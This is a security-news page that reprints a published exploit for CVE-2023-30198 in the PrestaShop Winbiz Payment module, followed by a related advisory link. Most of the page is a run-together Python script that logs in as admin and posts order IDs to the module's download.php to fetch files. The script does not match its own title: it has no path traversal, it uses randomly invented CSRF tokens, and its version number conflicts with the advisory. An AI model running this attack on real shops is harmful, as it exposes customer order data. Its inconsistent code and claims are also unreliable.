Security
Headlines
HeadlinesLatestCVEs

Headline

PrestaShop Winbiz Payment Improper Limitation

PrestaShop Winbiz Payment module suffers from an improper limitation of a Pathname to a restricted directory.

Packet Storm
#csrf#web#windows#linux#git#php#pdf#auth
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory# Date: 2023-06-20# Dork: /modules/winbizpayment/downloads/download.php# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html# Version: 17.1.3 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-30198import requestsimport stringimport random# The base URL of the vulnerable sitebase_url = "http://example.com"# The URL of the login pagelogin_url = base_url + "/authentication.php"# The username and password for the admin accountusername = "admin"password = "password123"# The URL of the vulnerable download.php filedownload_url = base_url + "/modules/winbizpayment/downloads/download.php"# The ID of the order to downloadorder_id = 1234# The path to save the downloaded filefile_path = "/tmp/order_%d.pdf" % order_id# The session cookies to use for the requestssession_cookies = None# Generate a random string for the CSRF tokencsrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))# Send a POST request to the login page to authenticate as the admin userlogin_data = {"email": username, "passwd": password, "csrf_token": csrf_token}session = requests.Session()response = session.post(login_url, data=login_data)# Save the session cookies for future requestssession_cookies = session.cookies.get_dict()# Generate a random string for the CSRF tokencsrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))# Send a POST request to the download.php file to download the order PDFdownload_data = {"id_order": order_id, "csrf_token": csrf_token}response = session.post(download_url, cookies=session_cookies, data=download_data)# Save the downloaded file to diskwith open(file_path, "wb") as f:    f.write(response.content)# Print a message indicating that the file has been downloadedprint("File downloaded to %s" % file_path)

Related news

CVE-2023-30198: PrestaShop/Tools.php at 6c05518b807d014ee8edb811041e3de232520c28 · PrestaShop/PrestaShop

Prestashop winbizpayment <= 1.0.2 is vulnerable to Incorrect Access Control via modules/winbizpayment/downloads/download.php.

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6